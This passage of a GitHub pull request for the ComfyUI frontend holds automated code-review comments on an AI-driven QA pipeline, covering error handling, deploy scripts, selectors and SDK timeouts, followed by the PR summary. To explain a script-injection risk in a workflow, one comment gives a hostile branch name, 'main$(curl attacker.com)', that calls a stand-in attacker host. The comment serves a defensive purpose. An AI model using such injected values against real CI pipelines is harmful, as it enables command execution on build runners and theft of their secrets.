that currently uses `awk ... | grep -oP '\[#\K\d+' | head -n "$TOP_N"`) to use
one of these portable approaches.
In `@scripts/qa-generate-test.ts`:
- Around line 140-144: The current markdown-fence stripping only matches
"```typescript" or "```ts"; update the first replace on the returned text so it
strips any fenced-code language hint instead (e.g., replace the
/^```(?:typescript|ts)?\n?/ pattern used when returning text) by using a single,
broader regex that matches any characters after the opening backticks up to the
newline (for example /^```[^\n]*\n?/), ensuring the final .replace and .trim
logic remain unchanged.
In `@scripts/qa-report-template.html`:
- Line 3: The external marked.js script tag
(src="https://cdn.jsdelivr.net/npm/marked/marked.min.js") lacks SRI and
crossorigin attributes; update the script element to pin a specific version
(e.g., use marked@15.0.7 in the src), compute the SHA-384 base64 hash for that
exact file (using the curl + openssl command shown in the review), and add
integrity="sha384-..." and crossorigin="anonymous" attributes to the tag so the
browser verifies the file before executing.
In `@scripts/qa-video-review.ts`:
- Around line 668-708: The code calls stat(beforeVideoPath) twice: once to log
size into beforeStat and again to populate reportInput.beforeVideoSizeBytes;
reuse the first result instead of calling stat a second time. Keep the existing
beforeStat variable (from the logging block) in scope or rename to
beforeStatCached and then set reportInput.beforeVideoPath = beforeVideoPath and
reportInput.beforeVideoSizeBytes = beforeStatCached.size before calling
buildReportMarkdown; ensure no second await stat(beforeVideoPath) remains.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 57935156-19fa-459c-967e-b6187ecb9074
📒 Files selected for processing (18)
.claude/skills/comfy-qa/REPRODUCE.md.claude/skills/comfy-qa/SKILL.md.github/workflows/pr-qa.yamldocs/qa/TROUBLESHOOTING.mddocs/qa/backlog.mddocs/qa/models.mdknip.config.tsscripts/qa-agent.tsscripts/qa-analyze-pr.test.tsscripts/qa-analyze-pr.tsscripts/qa-batch.shscripts/qa-deploy-pages.shscripts/qa-generate-test.tsscripts/qa-record.tsscripts/qa-report-template.htmlscripts/qa-reproduce.tsscripts/qa-video-review.test.tsscripts/qa-video-review.ts
| - name: Generate regression test from QA report | ||
| if: needs.resolve-matrix.outputs.mode == 'focused' && steps.pr.outputs.target_type == 'pr' | ||
| env: | ||
| GEMINI_API_KEY: ${{ secrets.GEMINI_API_KEY }} | ||
| GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} | ||
| run: | | ||
| PR_NUM="${{ steps.pr.outputs.number }}" | ||
| PR_BRANCH="${{ github.head_ref || github.ref_name }}" | ||
| if [ -z "$PR_NUM" ]; then | ||
| echo "No PR number, skipping test generation" | ||
| exit 0 | ||
| fi | ||
|
|
||
| # Find the first QA report | ||
| REPORT=$(find video-reviews -name '*-qa-video-report.md' -type f | head -1) | ||
| if [ ! -f "$REPORT" ]; then | ||
| echo "No QA report found, skipping test generation" | ||
| exit 0 | ||
| fi | ||
|
|
||
| # Ensure we have the PR diff | ||
| DIFF_FILE="${{ runner.temp }}/pr-diff.txt" | ||
| if [ ! -f "$DIFF_FILE" ]; then | ||
| gh pr diff "$PR_NUM" --repo "${{ github.repository }}" > "$DIFF_FILE" 2>/dev/null || true | ||
| fi | ||
|
|
||
| # Generate the test | ||
| TEST_NAME="qa-pr${PR_NUM}" | ||
| TEST_PATH="browser_tests/tests/${TEST_NAME}.spec.ts" | ||
| echo "::group::Generating regression test from QA report" | ||
| pnpm exec tsx scripts/qa-generate-test.ts \ | ||
| --qa-report "$REPORT" \ | ||
| --pr-diff "$DIFF_FILE" \ | ||
| --output "$TEST_PATH" || { | ||
| echo "Test generation failed (non-fatal)" | ||
| exit 0 | ||
| } | ||
| echo "::endgroup::" | ||
|
|
||
| # Push to {branch}-add-qa-test | ||
| TEST_BRANCH="${PR_BRANCH}-add-qa-test" | ||
| git checkout -b "$TEST_BRANCH" HEAD 2>/dev/null || git checkout "$TEST_BRANCH" 2>/dev/null || true | ||
| git add "$TEST_PATH" | ||
| git commit -m "test: add QA regression test for PR #${PR_NUM}" || { | ||
| echo "Nothing to commit" | ||
| exit 0 | ||
| } | ||
| git push origin "$TEST_BRANCH" --force-with-lease || echo "Push failed (non-fatal)" | ||
| echo "Pushed regression test to branch: $TEST_BRANCH" |
There was a problem hiding this comment.
Script injection risk: github.head_ref used directly in inline script.
The actionlint warning is valid. github.head_ref is user-controllable (PR branch name set by author) and is used directly in shell commands at line 869 and line 902-909. A malicious branch name like main$(curl attacker.com) could execute arbitrary commands.
Pass it through an environment variable to sanitize:
🔒 Proposed fix to prevent script injection
- name: Generate regression test from QA report
if: needs.resolve-matrix.outputs.mode == 'focused' && steps.pr.outputs.target_type == 'pr'
env:
GEMINI_API_KEY: ${{ secrets.GEMINI_API_KEY }}
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ PR_BRANCH: ${{ github.head_ref || github.ref_name }}
run: |
PR_NUM="${{ steps.pr.outputs.number }}"
- PR_BRANCH="${{ github.head_ref || github.ref_name }}"
if [ -z "$PR_NUM" ]; then
echo "No PR number, skipping test generation"
exit 0
fi🧰 Tools
🪛 actionlint (1.7.11)
[error] 867-867: "github.head_ref" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details
(expression)
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/pr-qa.yaml around lines 862 - 910, The step uses
github.head_ref directly in the inline shell which allows shell injection via
PR_BRANCH and later TEST_BRANCH; set the branch value as a step-level env var
(e.g., env: PR_BRANCH: '${{ github.head_ref || github.ref_name }}') and then in
the script sanitize and safely quote it before use (e.g.,
PR_BRANCH="${PR_BRANCH//[^a-zA-Z0-9._\/-]/_}"; PR_BRANCH="${PR_BRANCH}" and
always quote expansions like "$PR_BRANCH" and "$TEST_BRANCH"), and use safe git
invocations (git checkout -- "$TEST_BRANCH", git push origin -- "$TEST_BRANCH")
so git commands and the branch names (PR_BRANCH, TEST_BRANCH) cannot be used to
inject shell commands.
| function ghExec(cmd: string): string { | ||
| try { | ||
| return execSync(cmd, { | ||
| encoding: 'utf-8', | ||
| timeout: 30_000, | ||
| stdio: ['pipe', 'pipe', 'pipe'] | ||
| }).trim() | ||
| } catch (err) { | ||
| console.warn(`gh command failed: ${cmd}`) | ||
| console.warn((err as Error).message) | ||
| return '' | ||
| } | ||
| } |
There was a problem hiding this comment.
Fail the job when required GitHub data cannot be fetched.
ghExec() collapses every gh failure into '', and the PR/issue fetchers then build guides from empty title/body/diff instead of stopping. A transient auth, rate-limit, or API failure will silently produce a bogus QA plan that later phases treat as authoritative.
Possible fix
-function ghExec(cmd: string): string {
+function ghExec(cmd: string, required = true): string {
try {
return execSync(cmd, {
encoding: 'utf-8',
timeout: 30_000,
stdio: ['pipe', 'pipe', 'pipe']
}).trim()
} catch (err) {
console.warn(`gh command failed: ${cmd}`)
console.warn((err as Error).message)
- return ''
+ if (required) throw err
+ return ''
}
}
function fetchPrThread(prNumber: string, repo: string): PrThread {
console.warn('Fetching PR thread...')
- const prView = ghExec(
+ const prView = ghExec(
`gh pr view ${prNumber} --repo ${repo} --json title,body,labels`
)
@@
- const issueCommentsRaw = ghExec(
+ const issueCommentsRaw = ghExec(
`gh api repos/${repo}/issues/${prNumber}/comments --paginate`,
+ false
)
@@
- const reviewCommentsRaw = ghExec(
+ const reviewCommentsRaw = ghExec(
`gh api repos/${repo}/pulls/${prNumber}/comments --paginate`,
+ false
)
@@
- const reviewsRaw = ghExec(
+ const reviewsRaw = ghExec(
`gh api repos/${repo}/pulls/${prNumber}/reviews --paginate`,
+ false
)
- const diff = ghExec(`gh pr diff ${prNumber} --repo ${repo}`)
+ const diff = ghExec(`gh pr diff ${prNumber} --repo ${repo}`)Also applies to: 134-223
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-analyze-pr.ts` around lines 120 - 132, ghExec currently swallows
all gh failures and returns an empty string, which lets PR/issue fetchers (the
functions that call ghExec to get title/body/diff) continue with bogus empty
data; change ghExec to propagate failures by throwing an Error (including the
command, exit code/ stderr and original error message) instead of returning ''
(or alternatively call process.exit(1) after logging), and update the callers in
the PR/issue fetchers to either catch and handle that exception or let it bubble
to fail the job; ensure logs include the gh command, stderr and error.message
for debugging.
| DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \ | ||
| --project-name="comfy-qa" \ | ||
| --branch="$BRANCH" 2>&1) || true | ||
| echo "$DEPLOY_OUTPUT" | tail -5 | ||
|
|
||
| URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true) | ||
| FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev" | ||
|
|
||
| echo "url=${URL:-$FALLBACK_URL}" >> "$GITHUB_OUTPUT" |
There was a problem hiding this comment.
Don't emit a fake Pages URL after a failed deploy.
wrangler pages deploy is wrapped with || true, so auth/upload/validation failures still fall through to writing url=... to GITHUB_OUTPUT. That makes downstream comments look successful even when nothing was actually published.
Possible fix
-DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \
- --project-name="comfy-qa" \
- --branch="$BRANCH" 2>&1) || true
+if ! DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \
+ --project-name="comfy-qa" \
+ --branch="$BRANCH" 2>&1); then
+ echo "$DEPLOY_OUTPUT" >&2
+ exit 1
+fi
echo "$DEPLOY_OUTPUT" | tail -5
URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true)
FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \ | |
| --project-name="comfy-qa" \ | |
| --branch="$BRANCH" 2>&1) || true | |
| echo "$DEPLOY_OUTPUT" | tail -5 | |
| URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true) | |
| FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev" | |
| echo "url=${URL:-$FALLBACK_URL}" >> "$GITHUB_OUTPUT" | |
| if ! DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \ | |
| --project-name="comfy-qa" \ | |
| --branch="$BRANCH" 2>&1); then | |
| echo "$DEPLOY_OUTPUT" >&2 | |
| exit 1 | |
| fi | |
| echo "$DEPLOY_OUTPUT" | tail -5 | |
| URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true) | |
| FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev" | |
| echo "url=${URL:-$FALLBACK_URL}" >> "$GITHUB_OUTPUT" |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-deploy-pages.sh` around lines 372 - 380, The script currently
masks deployment failures by running `wrangler pages deploy ... 2>&1) || true`
and always writing a fallback `url=` to `GITHUB_OUTPUT`; remove the `|| true`
and instead check the deploy exit status (or inspect `DEPLOY_OUTPUT`) after
running `wrangler pages deploy` and only set `URL`/`FALLBACK_URL` and write to
`GITHUB_OUTPUT` when the deploy succeeded; if the deploy failed, emit an error
(use `echo`/`processLogger` equivalent) and exit non-zero so downstream steps
don't get a fake Pages URL — key symbols to update: `wrangler pages deploy`,
`DEPLOY_OUTPUT`, `URL`, `FALLBACK_URL`, and `GITHUB_OUTPUT`.
| async function clickSubmenuItem(page: Page, label: string) { | ||
| // Try PrimeVue tiered menu first (hamburger menu submenus) | ||
| const submenu = page.locator('.p-tieredmenu-submenu:visible').last() | ||
| const primeItem = submenu | ||
| .locator('.p-tieredmenu-item') | ||
| .filter({ hasText: label }) | ||
| .first() | ||
| if (await primeItem.isVisible().catch(() => false)) { | ||
| const box = await primeItem.boundingBox().catch(() => null) | ||
| if (box) | ||
| await moveCursorOverlay( | ||
| page, | ||
| box.x + box.width / 2, | ||
| box.y + box.height / 2 | ||
| ) | ||
| if (box) await clickCursorOverlay(page, true) | ||
| await primeItem.click({ timeout: 5000 }).catch(() => { | ||
| console.warn(`Click on PrimeVue menu item "${label}" failed`) | ||
| }) | ||
| if (box) await clickCursorOverlay(page, false) | ||
| await sleep(800) | ||
| return | ||
| } | ||
|
|
||
| // Try litegraph context menu (right-click on nodes/canvas) | ||
| const liteItem = page | ||
| .locator('.litemenu-entry') | ||
| .filter({ hasText: label }) | ||
| .first() | ||
| if (await liteItem.isVisible().catch(() => false)) { | ||
| const box = await liteItem.boundingBox().catch(() => null) | ||
| if (box) | ||
| await moveCursorOverlay( | ||
| page, | ||
| box.x + box.width / 2, | ||
| box.y + box.height / 2 | ||
| ) | ||
| if (box) await clickCursorOverlay(page, true) | ||
| await liteItem.click({ timeout: 5000 }).catch(() => { | ||
| console.warn(`Click on litegraph menu item "${label}" failed`) | ||
| }) | ||
| if (box) await clickCursorOverlay(page, false) | ||
| await sleep(800) | ||
| return | ||
| } | ||
|
|
||
| // Try any visible menu/context menu item | ||
| const anyItem = page.locator(`[role="menuitem"]:has-text("${label}")`).first() | ||
| if (await anyItem.isVisible().catch(() => false)) { | ||
| await anyItem.click({ timeout: 5000 }).catch(() => { | ||
| console.warn(`Click on menu role item "${label}" failed`) | ||
| }) | ||
| await sleep(800) | ||
| return | ||
| } | ||
|
|
||
| console.warn(`Submenu item "${label}" not found in any menu type`) | ||
| } |
There was a problem hiding this comment.
loadDefaultWorkflow can report success without loading anything.
If resetToDefaultWorkflow is absent, Lines 949-956 resolve successfully, so the fallback menu path never runs. And even in the fallback path, clickSubmenuItem() never signals failure, so loaded becomes true even when neither menu label exists.
Possible fix
-async function clickSubmenuItem(page: Page, label: string) {
+async function clickSubmenuItem(page: Page, label: string): Promise<boolean> {
@@
- await sleep(800)
- return
+ await sleep(800)
+ return true
}
@@
- await sleep(800)
- return
+ await sleep(800)
+ return true
}
@@
- await sleep(800)
- return
+ await sleep(800)
+ return true
}
console.warn(`Submenu item "${label}" not found in any menu type`)
+ return false
}
@@
case 'loadDefaultWorkflow':
- // Load default workflow via app API (most reliable, no menu navigation)
- try {
- await page.evaluate(() => {
+ const usedApi = await page.evaluate(() => {
const app = (window as unknown as Record<string, unknown>).app as {
loadGraphData?: (d: unknown) => Promise<void>
resetToDefaultWorkflow?: () => Promise<void>
}
- if (app?.resetToDefaultWorkflow) return app.resetToDefaultWorkflow()
- return Promise.resolve()
+ if (!app?.resetToDefaultWorkflow) return false
+ return app.resetToDefaultWorkflow().then(() => true)
})
- await sleep(1000)
- } catch {
+ if (!usedApi) {
await openComfyMenu(page)
await hoverMenuItem(page, 'File')
- const loaded = await clickSubmenuItem(page, 'Load Default')
- .then(() => true)
- .catch(() => false)
+ const loaded = await clickSubmenuItem(page, 'Load Default')
if (!loaded) {
- await clickSubmenuItem(page, 'Default Workflow').catch(() => {})
+ await clickSubmenuItem(page, 'Default Workflow')
}
- await sleep(1000)
}
+ await sleep(1000)
breakAlso applies to: 946-969
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 630 - 687, The loadDefaultWorkflow flow
can mark loaded=true even when no menu action ran because resetToDefaultWorkflow
may be missing and clickSubmenuItem never reports failure; change
clickSubmenuItem to return a boolean (true when it found & clicked a menu entry,
false when none matched) and update loadDefaultWorkflow to use that return value
(and the presence of resetToDefaultWorkflow) to set loaded only when an actual
action occurred; specifically modify clickSubmenuItem (and its callers) to
return true after each successful PrimeVue, litegraph, or role="menuitem" path
and return false at the end, then in loadDefaultWorkflow check the boolean
result from clickSubmenuItem and only set loaded = true when
resetToDefaultWorkflow exists or clickSubmenuItem returned true, otherwise
log/handle failure.
| async function clickByText(page: Page, text: string) { | ||
| const el = page.locator(`text=${text}`).first() | ||
| if (await el.isVisible().catch(() => false)) { | ||
| // Get element position for cursor overlay | ||
| const box = await el.boundingBox().catch(() => null) | ||
| if (box) { | ||
| await moveCursorOverlay( | ||
| page, | ||
| box.x + box.width / 2, | ||
| box.y + box.height / 2 | ||
| ) | ||
| } | ||
| await el.hover({ timeout: 3000 }).catch(() => {}) | ||
| await sleep(400) | ||
| if (box) await clickCursorOverlay(page, true) | ||
| await el.click({ timeout: 5000 }).catch((e) => { | ||
| console.warn( | ||
| `Click on "${text}" failed: ${e instanceof Error ? e.message.split('\n')[0] : e}` | ||
| ) | ||
| }) | ||
| if (box) await clickCursorOverlay(page, false) | ||
| await sleep(500) | ||
| } else { | ||
| console.warn(`Element with text "${text}" not found`) | ||
| } |
There was a problem hiding this comment.
No-op actions are being reported back as successes.
Several branches only console.warn when the target is missing and then fall through to the final return { success: true }. That means stale selectors and missing menus are fed back into the planner as successful actions, so it loses the signal it needs to retry with a different approach.
Also applies to: 789-1107
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 745 - 769, The clickByText function
currently treats missing/failed actions as successes (it only console.warns), so
update it to return or throw a failure when the target element is not found or
when critical steps fail: if el.isVisible() is false, immediately return {
success: false, reason: 'element not found', target: text } (or throw an Error);
if boundingBox() is null and you rely on cursor overlay actions, treat that as
non-fatal only if you still successfully click, otherwise return failure; when
el.click() rejects, return { success: false, reason: 'click failed', error:
e.message } instead of just logging; apply the same pattern to related functions
referenced in the diff (moveCursorOverlay, clickCursorOverlay, other click-by-*
utilities in the 789-1107 range) so all branches produce a clear failure result
or throw, not just console.warn.
| case 'cloneNode': { | ||
| // Select node then Ctrl+C/Ctrl+V — works in both legacy and Nodes 2.0 | ||
| await page.mouse.click(step.x, step.y) | ||
| await sleep(300) | ||
| await page.keyboard.press('Control+c') | ||
| await sleep(200) | ||
| await page.keyboard.press('Control+v') | ||
| await sleep(500) | ||
| console.warn(` Cloned node at (${step.x}, ${step.y}) via Ctrl+C/V`) | ||
| break |
There was a problem hiding this comment.
cloneNode is exercising copy/paste, not Clone.
The prompts and preflight use this action for clone-specific issues, but the implementation just sends Ctrl+C / Ctrl+V. Any regression in the actual Clone command/path will be missed or misclassified.
Also applies to: 1223-1226, 1308-1311
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 1035 - 1044, The current case 'cloneNode'
handler in scripts/qa-record.ts is performing a generic copy/paste
(Ctrl+C/Ctrl+V) which does not exercise the real Clone functionality; replace
the keystroke sequence with a call that invokes the application's actual
Clone/duplicate command (e.g., click the clone/duplicate toolbar/menu/button
element or trigger the app's clone command via the command palette or exposed
API) so tests exercise the Clone code path; update the same pattern in the other
cloneNode occurrences noted (the blocks around the other mentions) to use the
real clone action instead of Ctrl+C/Ctrl+V and emit a matching log message.
| for (let i = 0; i < subIssues.length; i++) { | ||
| const subIssue = subIssues[i] | ||
| const sessionLabel = subIssues.length === 1 ? '' : `-${i + 1}` | ||
| const videoName = `qa-session${sessionLabel}.webm` | ||
|
|
There was a problem hiding this comment.
Per-pass replay videos are being overwritten or mislabeled.
Each pass derives a unique videoName, but Phase 2 always copies the deterministic replay output to qa-session.webm. In multi-pass mode that shared file is reused across passes, and the later rename step can end up storing the idle research-browser capture under the pass-specific name instead.
Possible fix
if (research.verdict === 'REPRODUCED' && research.testCode) {
@@
try {
const videos = execSync(
`find "${testResultsDir}" -name '*.webm' -type f 2>/dev/null`,
{ encoding: 'utf-8' }
)
@@
if (videos.length > 0) {
- execSync(`cp "${videos[0]}" "${opts.outputDir}/qa-session.webm"`)
- console.warn(`Phase 2: Video → ${opts.outputDir}/qa-session.webm`)
+ const replayVideoPath = `${opts.outputDir}/${videoName}`
+ execSync(`cp "${videos[0]}" "${replayVideoPath}"`)
+ console.warn(`Phase 2: Video → ${replayVideoPath}`)
}
} catch {
console.warn('Phase 2: No test video found')
}
@@
- const videoPath = `${opts.outputDir}/${videoName}`
- if (statSync(videoPath, { throwIfNoEntry: false })) {
+ const videoPath = `${opts.outputDir}/${videoName}`
+ if (statSync(videoPath, { throwIfNoEntry: false })) {
console.warn(
'Phase 2 test video exists — skipping research video rename'
)
} else {
renameLatestWebm(opts.outputDir, videoName, knownNames)
}Also applies to: 2024-2035, 2055-2065
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 1921 - 1925, The per-pass replay output is
being overwritten because Phase 2 always writes to a deterministic
qa-session.webm instead of the pass-specific name; update the Phase 2
copy/rename logic to use the loop's videoName variable (constructed from
subIssues and sessionLabel) as the temporary/output filename so each pass writes
to a unique file and the later rename step moves the correct per-pass recording;
ensure any hard-coded "qa-session.webm" occurrences are replaced to reference
videoName (and preserve behavior when subIssues.length === 1 by allowing an
empty sessionLabel).
| interface A11yNode { | ||
| role: string | ||
| name: string | ||
| value?: string | ||
| checked?: boolean | ||
| disabled?: boolean | ||
| expanded?: boolean | ||
| children?: A11yNode[] | ||
| } | ||
|
|
||
| function searchA11y(node: A11yNode | null, selector: string): A11yNode | null { | ||
| if (!node) return null | ||
| const sel = selector.toLowerCase() | ||
| if ( | ||
| node.name?.toLowerCase().includes(sel) || | ||
| node.role?.toLowerCase().includes(sel) | ||
| ) { | ||
| return node | ||
| } | ||
| if (node.children) { | ||
| for (const child of node.children) { | ||
| const found = searchA11y(child, selector) | ||
| if (found) return found | ||
| } | ||
| } | ||
| return null | ||
| } |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
# First, locate the file and check its size
fd -t f "qa-reproduce.ts" --type f
wc -l scripts/qa-reproduce.ts 2>/dev/null || echo "File not found"Repository: Comfy-Org/ComfyUI_frontend
Length of output: 121
🏁 Script executed:
# Read lines 167-207 to see the actual assertion code
sed -n '167,207p' scripts/qa-reproduce.tsRepository: Comfy-Org/ComfyUI_frontend
Length of output: 1503
🏁 Script executed:
# Also read lines 53-79 and surrounding context to see the function definitions
sed -n '50,90p' scripts/qa-reproduce.tsRepository: Comfy-Org/ComfyUI_frontend
Length of output: 1122
🌐 Web query:
Playwright Locator ariaSnapshot() return type documentation
💡 Result:
The Playwright Locator.ariaSnapshot method returns a Promise, where the string is a YAML representation of the accessibility tree (ARIA snapshot) for the element and its children within the locator's scope. This feature was added in v1.49. Usage example: const snapshot = await page.getByRole('link').ariaSnapshot; The snapshot string uses YAML markup, with roles, accessible names, attributes, and child elements (e.g., - list "Links": - listitem: - link "Home"). Optional arguments include depth (v1.59+), mode ("ai" | "default", v1.59+), and timeout.
Citations:
- 1: https://playwright.dev/docs/api/class-locator
- 2: https://playwright.dev/docs/next/api/class-locator
- 3: https://github.com/microsoft/playwright/blob/main/docs/src/api/class-locator.md
Parse the ARIA snapshot before traversing it.
Line 195 casts locator.ariaSnapshot() to A11yNode, but the Playwright API returns a Promise<string> with YAML-formatted accessibility snapshot, not an object tree. The current code will fail at runtime: when a11yAfter is a string, node.name?.toLowerCase() and node.children return undefined, causing searchA11y() to always return null. This breaks all assertions—they degrade to NOT FOUND regardless of actual accessibility state. Parse the YAML string (or use a Playwright-provided parser) before passing it to searchA11y().
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-reproduce.ts` around lines 53 - 79, The accessibility snapshot
returned by locator.ariaSnapshot() is a YAML string, so instead of casting it to
A11yNode, first await the Promise<string> and parse the YAML into an object (or
use Playwright's parser) before calling searchA11y; update the code that
currently casts the result (where a11yAfter is treated as A11yNode) to await
locator.ariaSnapshot(), parse the YAML into the A11yNode shape, and then pass
that parsed object to searchA11y and subsequent checks so node.name and
node.children are valid.
| const result = await model.generateContent(parts, { | ||
| timeout: options.timeoutMs | ||
| }) |
There was a problem hiding this comment.
🧩 Analysis chain
🌐 Web query:
@google/generative-ai npm package generateContent timeout option API
💡 Result:
The @google/genai npm package (the current Google Gen AI JavaScript SDK, replacing the deprecated @google/generative-ai) supports a timeout option for the generateContent API through the GenerateContentConfig's httpOptions field. Usage: import { GoogleGenAI } from '@google/genai'; const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY }); const response = await ai.models.generateContent({ model: 'gemini-2.5-flash', contents: 'Your prompt here', config: { httpOptions: { timeout: 60000 // milliseconds, e.g., 60 seconds } } }); Note: There is an open bug (as of March 2026) where config.httpOptions.timeout may not work correctly for long generations (>5 minutes), causing hidden errors or ineffective timeouts (GitHub issue #1277). Use AbortSignal as an alternative client-side cancellation: const controller = new AbortController; setTimeout( => controller.abort, 60000); config: { abortSignal: controller.signal } Official documentation confirms httpOptions?: HttpOptions in GenerateContentConfig interface, used to override HTTP request options including timeout.
Citations:
- 1: Support for
config.httpOptions.timeoutoption is broken formodels.generateContentgoogleapis/js-genai#1277 - 2: https://googleapis.github.io/js-genai/release_docs/interfaces/types.GenerateContentConfig.html
- 3: https://tessl.io/registry/tessl/npm-google--genai/1.30.0/docs/content-generation.md
- 4: https://www.npmjs.com/package/@google/genai
- 5: https://googleapis.github.io/js-genai/release_docs/classes/models.Models.html
- 6: https://github.com/googleapis/js-genai/blob/89400098/src/types.ts
🏁 Script executed:
fd package.json | head -5 | xargs catRepository: Comfy-Org/ComfyUI_frontend
Length of output: 14674
🏁 Script executed:
rg "@google/generative-ai|@google/genai" --type ts --type json -A 2 | head -30Repository: Comfy-Org/ComfyUI_frontend
Length of output: 989
🌐 Web query:
@google/generative-ai deprecated SDK generateContent timeout parameter API
💡 Result:
The @google/generative-ai Node.js SDK is deprecated. Migrate to the new @google/genai SDK, which is the unified Google Gen AI SDK for JavaScript/TypeScript. In the deprecated @google/generative-ai SDK, the generateContent method supported a timeout via RequestOptions: const model = genAI.getGenerativeModel({ model: "gemini-pro" }); const result = await model.generateContent(prompt, { ...generationConfig, requestOptions: { timeout: 30000 } // milliseconds }); This direct timeout parameter/requestOptions.timeout is not carried over to the new SDK. In the current @google/genai SDK (as of 2026), use httpOptions in GenerateContentConfig for timeouts: import { GoogleGenAI } from '@google/genai'; const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY }); const response = await ai.models.generateContent({ model: 'gemini-2.5-flash', contents: 'Your prompt', config: { httpOptions: { timeout: 30000 } // milliseconds, overrides client defaults } }); Timeouts can also be set at the client level: const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY, httpOptions: { timeout: 60000 } }); For cancellation (client-side), use abortSignal: AbortSignal.timeout(30000). No evidence of a direct 'timeout' parameter deprecation announcement for generateContent specifically, but the entire old SDK is deprecated (end-of-life Nov 2025), and the new API uses httpOptions instead of requestOptions.
Citations:
- 1: https://googleapis.github.io/js-genai/release_docs/interfaces/types.GenerateContentConfig.html
- 2: https://googleapis.github.io/js-genai/release_docs/index.html
- 3: https://github.com/google-gemini/deprecated-generative-ai-js
- 4: https://www.npmjs.com/package/@google/generative-ai?activeTab=versions
- 5: Feature Addition: Introduce Request Timeout Configuration google-gemini/deprecated-generative-ai-js#31
- 6: https://github.com/google-gemini/deprecated-generative-ai-js/blob/main/docs/reference/files/generative-ai.requestoptions.timeout.md
- 7: https://mintlify.com/googleapis/python-genai/guides/http-options
- 8: https://ai.google.dev/gemini-api/docs/migrate
- 9: https://raw.githubusercontent.com/googleapis/js-genai/refs/heads/main/codegen_instructions.md
🏁 Script executed:
sed -n '580,598p' scripts/qa-video-review.tsRepository: Comfy-Org/ComfyUI_frontend
Length of output: 491
Fix timeout parameter format for @google/generative-ai SDK.
The code passes timeout directly in the options object, but the deprecated @google/generative-ai SDK expects it wrapped in requestOptions. Update to:
const result = await model.generateContent(parts, {
requestOptions: { timeout: options.timeoutMs }
})
Without this change, the timeout will be ignored and API calls may hang indefinitely.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-video-review.ts` around lines 587 - 589, The timeout is being
passed directly to model.generateContent which the deprecated
`@google/generative-ai` SDK ignores; update the call to pass the timeout inside a
requestOptions object (i.e., when calling model.generateContent(parts, ...) wrap
options.timeoutMs as requestOptions: { timeout: options.timeoutMs }) so the SDK
respects the timeout setting.
Summary
Automated QA pipeline that uses Claude to write Playwright E2E tests reproducing reported bugs, records video evidence, and deploys results to Cloudflare Pages.
Changes
qa-changes,qa-full,qa-issue):@google/generative-aiand@anthropic-ai/claude-agent-sdk(installed inline in CI, not added to package.json)Files added (17 files, ~7.5k lines)
.github/workflows/pr-qa.yamlscripts/qa-agent.tsscripts/qa-record.tsscripts/qa-reproduce.tsscripts/qa-analyze-pr.tsscripts/qa-video-review.tsscripts/qa-deploy-pages.shscripts/qa-generate-test.tsscripts/qa-report-template.htmlscripts/qa-batch.sh.claude/skills/comfy-qa/SKILL.mddocs/qa/TROUBLESHOOTING.mddocs/qa/backlog.md,models.mdknip.config.tsReview Focus
qa-changes,qa-full,qa-issue) — no automatic runscount > 0) are banned — tests must assert bug-specific behaviordist/is cached by SHA to speed up before/after comparisons┆Issue is synchronized with this Notion page by Unito